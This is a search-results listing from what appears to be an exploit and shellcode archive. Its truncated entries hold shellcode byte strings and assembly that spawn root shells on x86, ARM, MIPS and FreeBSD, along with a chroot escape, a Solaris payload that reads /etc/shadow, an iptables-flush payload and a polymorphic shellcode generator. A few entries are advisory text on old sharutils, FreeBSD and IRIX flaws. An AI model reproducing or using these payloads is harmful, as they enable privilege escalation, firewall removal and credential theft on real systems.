1131 matches found
linux/x86 execve("/bin/ash",0,0); 21 bytes
No description provided by source. / 21 byte execve/bin/ash,0,0; shellcode for linux x86 by zasta zasta at darkircop.org / include unistd.h include stdio.h char shellcode = \x31\xc9\xf7\xe1\x04\x0b\x52\x68 \x2f\x61\x73\x68\x68\x2f\x62\x69 \x6e\x89\xe3\xcd\x80; void code asm xor %ecx,%ecx mul %ecx...
GNU Sharutils <= 4.2.1 - Local Format String PoC Exploit
No description provided by source. / GNU sharutils = 4.2.1 Local Format String POC Code C0ded by n4rk0tix a.k.a nrktx [email protected] Below is a l4m3 proof of concept code for da recently reported lame bug; These binaryz have not only format bugz, but also buffer overflowz,etc.We also...
Linux/ARM - execve("/bin/sh","/bin/sh",0) - 30 bytes
No description provided by source. / Title: Linux/ARM - execve/bin/sh,/bin/sh,0 - 30 bytes Date: 2010-06-28 Tested: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan Web: http://shell-storm.org | http://twitter.com/jonathansalwan ! Dtabase of shellcodes http://www.shell-storm.org/shellcode/ 8054:...
Linux x86 execve("/usr/bin/wget", "aaaa"); - 42 bytes
No description provided by source. / Title: Linux x86 execve/usr/bin/wget, aaaa; - 42 bytes Author: Jonathan Salwan submit AT shell-storm.org Web: http://www.shell-storm.org Twitter: http://twitter.com/jonathansalwan !Database of Shellcodes http://www.shell-storm.org/shellcode/ 08048054 .text:...
freebsd/x86 execve /bin/sh 23 bytes (2)
No description provided by source. / FreeBSD 23 byte execve code. Greetz to anathema, the first who published this way of writing shellcodes. greetz to preedator marcetam [email protected] / char fbsdexecve= \x99 / cdq / \x52 / push %edx / \x68\x6e\x2f\x73\x68 / push $0x68732f6e /...
linux/x86 break chroot setuid(0) + /bin/sh 132 bytes
No description provided by source. / Linux/x86 - setreuid0, 0; - chroot-break make a temp dir with mkdir, chroot to tempdir, go through a loop of chdir..; then a final chroot.; - execve of /bin/sh used in several wu-ftpd, beroftpd and proftpd exploits, amongst others / include stdio.h char c0de =...
FreeBSD 4.10/5.x execve() Unaligned Memory Access Denial of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/10596/info It is reported that FreeBSD running on the Alpha architecture is susceptible to a denial of service vulnerability in its execve system call. An attacker with local interactive user-level access on an affected...
Linux/ARM - setuid(0) & execve("/bin/sh","/bin/sh",0) - 38 bytes
No description provided by source. / Title: Linux/ARM - setuid0 & execve/bin/sh,/bin/sh,0 - 38 bytes Date: 2010-06-29 Tested: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan Web: http://shell-storm.org | http://twitter.com/jonathansalwan ! Dtabase of shellcodes http://www.shell-storm.org/shellcode/...
SGI IRIX 6.2 - day5notifier Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/345/info A vulnerability exists in the day5notifier program, shipped with Irix 6.2 from Silicon Graphics Inc. This program will allow any user to run any command as root. day5notifier wisely replaces a number of system...
39 bytes sys_setuid(0) & sys_setgid(0) & execve ("/bin/sh") x86 linux shellcode
No description provided by source. / Name : 39 bytes syssetuid0 & syssetgid0 & execve /bin/sh x86 linux shellcode Date : Tue Jun 1 21:29:10 2010 Author : gunslinger yudha.gunslingeratgmail.com Web : http://devilzc0de.org blog : http://gunslingerc0de.wordpress.com tested on : linux debian / includ...
25 bytes execve("/bin/sh") shellcode
No description provided by source. include stdio.h include string.h / by Magnefikko 14.04.2010 [email protected] promhyl.oz.pl Subgroup: PRekambr Name: 25 bytes execve/bin/sh shellcode Platform: Linux x86 execve/bin/sh, 0, 0; gcc -Wl,-z,execstack filename.c shellcode:...
linux/x86 execve /bin/sh toupper() evasion 55 bytes
No description provided by source. / Linux/x86 toupper evasion, standard execve /bin/sh used eg. in various imapd exploits. Goes through a loop adding 0x20 to the /bin/sh -= 0x20 string ie. yields /bin/sh after addition. / include stdio.h char c0de = / main: / \xeb\x29 / jmp callz / / start: / \x...
34 bytes setreud(getuid(), getuid()) & execve("/bin/sh") Shellcode
No description provided by source. include stdio.h include string.h / by Magnefikko 14.04.2010 [email protected] promhyl.oz.pl Subgroup: PRekambr Name: 34 bytes setreudgetuid, getuid & execve/bin/sh shellcode Platform: Linux x86 setreuidgetuid, getuid; execve/bin/sh; gcc -Wl,-z,execstack...
Linux/x86-64 - execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL) - 49 bytes
No description provided by source. / Title: Linux/x86-64 - execve/sbin/iptables, /sbin/iptables, -F, NULL - 49 bytes Author: 10n1z3d 10n1z3datwdotcn Date: Fri 09 Jul 2010 03:26:12 PM EEST Source Code NASM: section .text global start start: xor rax, rax push rax push word 0x462d mov rcx, rsp mov...
Linux/MIPS - execve /bin/sh - 48 bytes
No description provided by source. / Title: Linux/MIPS - execve /bin/sh - 48 bytes Date: 2011-11-24 Author: rigan - imrigan at gmail.com .text .global start start: slti $a2, $zero, -1 li $t7, 0x2f2f6269 sw $t7, -12$sp li $t6, 0x6e2f7368 sw $t6, -8$sp sw $zero, -4$sp la $a0, -12$sp slti $a1, $zero...
solaris/x86 setuid(0), execve(/bin/cat, /etc/shadow), exit(0) 59 bytes
No description provided by source. / ; sm4x 2008 ; /bin/cat /etc/shadow ; 59 bytes ; SunOS sol01 5.11 snv86 i86pc i386 i86pc Solaris ; port to SunOS to pwn a b0x - thank god for that default unix CRYPTDEFAULT!!!! ; this is what happens when ur work takes away root pirv on a SunOS box :-/ global...
linux/x86 setreuid(0,0) execve("/bin/sh", ["/bin/sh", NULL]) 33 bytes
No description provided by source. / Linux/x86 setreuid0,0 + execve/bin/sh, /bin/sh, NULL - 33 bytes - [email protected] / char shellcode = \x6a\x46 // push $0x46 \x58 // pop %eax \x31\xdb // xor %ebx, %ebx \x31\xc9 // xor %ecx, %ecx \xcd\x80 // int $0x80 \x31\xd2 // xor %edx, %edx \x6a\x0b // pus...
ARM Polymorphic execve("/bin/sh", ["/bin/sh"], NULL) Shellcode Generator
No description provided by source. / Title: Generator polymorphic shellcode on ARM architecture Date: 2010-07-07 Tested on: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan Web: http://shell-storm.org | http://twitter.com/jonathansalwan ! Database of shellcodes http://www.shell-storm.org/shellcode/...
linux/x86-64 execve(/bin/sh) 52 bytes
No description provided by source. / Exploit Title : linux/x86-64 execve/bin/sh 52 bytes Tested on : Linux iron 2.6.38-8-generic 42-Ubuntu SMP Mon Apr 11 03:31:24 UTC 2011 x8664 x8664 x8664 GNU/Linux Date : 03/12/2011 Author : X-h4ck Email : [email protected] Website : http://www.pirate.al Greetz :...
linux/x86 setuid(0) + execve("/bin/sh", ["/bin/sh", NULL]) 31 bytes
No description provided by source. / Linux/x86 setuid0 + execve/bin/sh, /bin/sh, NULL - 31 bytes - [email protected] / char shellcode = \x6a\x17 // push $0x17 \x58 // pop %eax \x31\xdb // xor %ebx, %ebx \xcd\x80 // int $0x80 \x31\xd2 // xor %edx, %edx \x6a\x0b // push $0xb \x58 // pop %eax \x52 //...